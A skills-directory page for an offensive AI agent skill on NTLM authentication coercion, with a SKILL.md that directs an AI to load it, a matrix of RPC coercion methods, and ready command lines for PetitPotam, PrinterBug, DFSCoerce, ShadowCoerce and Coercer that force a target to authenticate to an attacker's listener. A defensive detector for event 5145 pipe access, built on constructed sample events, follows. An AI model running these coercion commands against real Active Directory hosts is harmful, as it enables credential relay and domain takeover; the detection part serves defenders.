
Ntlm Relay Coercion
Compare NTLM authentication coercion methods and RPC-level details during authorized Active Directory security assessments.
Install
npx skills add https://github.com/yaklang/hack-skills --skill ntlm-relay-coercion
What is this skill?
- Coercion methods matrix across PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, MSEven, and CheeseOunce
- RPC interface, function, protocol (SMB 445), auth type, and credential requirements per method
- PetitPotam MS-EFSR abuse notes including unauthenticated variants on misconfigured targets
- Designed as a deep-dive companion after loading main NTLM relay SKILL.md fundamentals
- Coercer tool usage and function-level comparison for assessment planning
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
Journey fit
Coercion and relay technique selection belongs in Ship security work when hardening or ethically testing Windows/AD exposure before production trust boundaries fail. Security subphase covers offensive validation patterns, patch posture, and controlled abuse of legacy auth paths—not feature development.
Common Questions / FAQ
Is Ntlm Relay Coercion safe to install?
skills.sh reports 1 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.
SKILL.md
SKILL.md - Ntlm Relay Coercion
# Authentication Coercion Methods

> **AI LOAD INSTRUCTION**: Load this for detailed authentication coercion method comparison, RPC function-level details, and the Coercer tool usage. Assumes the main [SKILL.md](./SKILL.md) is already loaded for NTLM relay fundamentals.

---

## 1. COERCION METHODS MATRIX

| Method | RPC Interface | Function | Protocol | Auth Type | Requires Creds? | Target |
|---|---|---|---|---|---|---|
| **PetitPotam** | MS-EFSR (lsarpc) | EfsRpcOpenFileRaw + variants | SMB (445) | Machine account | No (unauthenticated on unpatched) | DC/Any |
| **PrinterBug** | MS-RPRN (spoolss) | RpcRemoteFindFirstPrinterChangeNotificationEx | SMB (445) | Machine account | Yes (domain user) | Any with Spooler |
| **DFSCoerce** | MS-DFSNM (netdfs) | NetrDfsRemoveStdRoot / NetrDfsAddStdRoot | SMB (445) | Machine account | Yes (domain user) | DC |
| **ShadowCoerce** | MS-FSRVP (fssagent) | IsPathShadowCopied / IsPathSupported | SMB (445) | Machine account | Yes (domain user) | File servers |
| **MSEven** | MS-EVEN (eventlog) | ElfrOpenBELW | SMB (445) | Machine account | Yes (domain user) | Any |
| **CheeseOunce** | MS-EVEN | OpenEventLogW (via named pipe) | SMB (445) | Machine account | Yes | Any |

---

## 2. PETITPOTAM — MS-EFSR ABUSE

### Unauthenticated (Pre-Patch / Misconfigured)

```bash
# Original PetitPotam — unauthenticated
PetitPotam.py LISTENER_IP TARGET_IP

# Specific EFS functions:
PetitPotam.py -method EfsRpcOpenFileRaw LISTENER_IP TARGET_IP
PetitPotam.py -method EfsRpcEncryptFileSrv LISTENER_IP TARGET_IP
```

### Authenticated

```bash
# With credentials (required on patched systems)
PetitPotam.py -u user -p password -d domain.com LISTENER_IP TARGET_IP
```

### EFS RPC Function Variants

| Function | Patched? | Notes |
|---|---|---|
| `EfsRpcOpenFileRaw` | Patched (Nov 2021) | Original PetitPotam function |
| `EfsRpcEncryptFileSrv` | Patched later | Alternative function |
| `EfsRpcDecryptFileSrv` | Partially patched | May still work |
| `EfsRpcQueryUsersOnFile` | Partially patched | May still work |
| `EfsRpcQueryRecoveryAgents` | Partially patched | May still work |
| `EfsRpcFileKeyInfo` | Varies | Check per target |

---

## 3. PRINTERBUG — MS-RPRN (SPOOLSAMPLE)

### Prerequisites

- Print Spooler service running on target
- Valid domain credentials

```bash
# SpoolSample (Windows)
SpoolSample.exe TARGET_HOST LISTENER_HOST

# printerbug.py (Impacket)
printerbug.py DOMAIN/user:password@TARGET_IP LISTENER_IP

# Dementor (Python)
python3 dementor.py -d domain.com -u user -p password LISTENER_IP TARGET_IP
```

### Check If Spooler Is Running

```bash
# From Linux
rpcdump.py DOMAIN/user:pass@TARGET_IP | grep -i spoolss

# CrackMapExec
crackmapexec smb TARGET_IP -u user -p pass -M spooler
```

---

## 4. DFSCOERCE — MS-DFSNM

```bash
# DFSCoerce
python3 dfscoerce.py -u user -p password -d domain.com LISTENER_IP TARGET_IP

# Specific functions
python3 dfscoerce.py -u user -p password -d domain.com \
  -method NetrDfsRemoveStdRoot LISTENER_IP TARGET_IP
```

### MS-DFSNM Functions

| Function | Notes |
|---|---|
| `NetrDfsRemoveStdRoot` | Primary coercion function |
| `NetrDfsAddStdRoot` | Alternative |

---

## 5. SHADOWCOERCE — MS-FSRVP

Exploits the File Server VSS Agent Service (requires the service to be running — common on file servers).

```bash
# ShadowCoerce
python3 shadowcoerce.py -u user -p password -d domain.com LISTENER_IP TARGET_IP
```

### MS-FSRVP Functions

| Function | Notes |
|---|---|
| `IsPathShadowCopied` | Primary function |
| `IsPathSupported` | Alternative function |
| `GetShareMapping` | Another variant |

---

## 6. COERCER — AUTOMATED DISCOVERY TOOL

[Coercer](https://github.com/p0dalirius/Coercer) automates testing all known coercion methods.

```bash
# Scan for available coercion methods on target
coercer scan -u user -p password -d domain.com -t TARGET_IP

# Coerce using all available methods
coercer coerce -u user -p password -d domain.com -t TARGET_IP -l LISTENER_IP

# Specific method
```
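One defender-side use of the methods matrix, as an added example that is not part of the skill's SKILL.md: every method listed reaches its RPC interface over SMB through a named pipe under IPC$, and Windows Security event 5145 (detailed file share access) records that pipe name in RelativeTargetName, so pipe opens can be mapped back to the interface and method in the matrix. The pipe-to-interface table (including FssagentRpc for MS-FSRVP), the allowed-source list and the sample event records are assumptions constructed for this example, not real telemetry.

```python
# Added example (not from the skill page): map IPC$ named-pipe opens from Windows
# Security event 5145 back to the coercion RPC interfaces in the matrix above.
# Field names follow the 5145 event (ShareName, RelativeTargetName, IpAddress,
# SubjectUserName); the records in SAMPLE_EVENTS are CONSTRUCTED, not real logs.

COERCION_PIPES = {
    # pipe name (RelativeTargetName) -> (RPC interface, method from the matrix)
    "lsarpc": ("MS-EFSR", "PetitPotam"),
    "efsrpc": ("MS-EFSR", "PetitPotam"),
    "spoolss": ("MS-RPRN", "PrinterBug"),
    "netdfs": ("MS-DFSNM", "DFSCoerce"),
    "FssagentRpc": ("MS-FSRVP", "ShadowCoerce"),   # assumed pipe name for fssagent
    "eventlog": ("MS-EVEN", "MSEven / CheeseOunce"),
}

SAMPLE_EVENTS = [  # constructed 5145/5140 records in exported-field form
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "lsarpc",
     "IpAddress": "10.0.0.77", "SubjectUserName": "ANONYMOUS LOGON"},
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "spoolss",
     "IpAddress": "10.0.0.77", "SubjectUserName": "jdoe"},
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc",
     "IpAddress": "10.0.0.5", "SubjectUserName": "jdoe"},
    {"EventID": 5140, "ShareName": "\\\\*\\SYSVOL", "RelativeTargetName": "",
     "IpAddress": "10.0.0.5", "SubjectUserName": "DC01$"},
]

def flag_coercion_pipe_access(events, allowed_sources=()):
    """Return one finding per IPC$ pipe open that matches a coercion interface.
    allowed_sources: client IPs expected to use these pipes (e.g. print servers)."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5145 or not ev.get("ShareName", "").endswith("IPC$"):
            continue
        pipe = ev.get("RelativeTargetName", "")
        if pipe not in COERCION_PIPES or ev.get("IpAddress") in allowed_sources:
            continue
        iface, method = COERCION_PIPES[pipe]
        anonymous = ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON"
        findings.append({
            "source": ev["IpAddress"], "pipe": pipe, "interface": iface,
            "method": method,
            # an unauthenticated EFSR pipe open matches the unpatched PetitPotam case
            "severity": "high" if anonymous and iface == "MS-EFSR" else "medium",
        })
    return findings

if __name__ == "__main__":
    for finding in flag_coercion_pipe_access(SAMPLE_EVENTS):
        print(finding)
```

Tuning the allowed-source list to the hosts that legitimately open spoolss or netdfs on a DC is what keeps this signal usable; the pipe match alone only says which interface was touched.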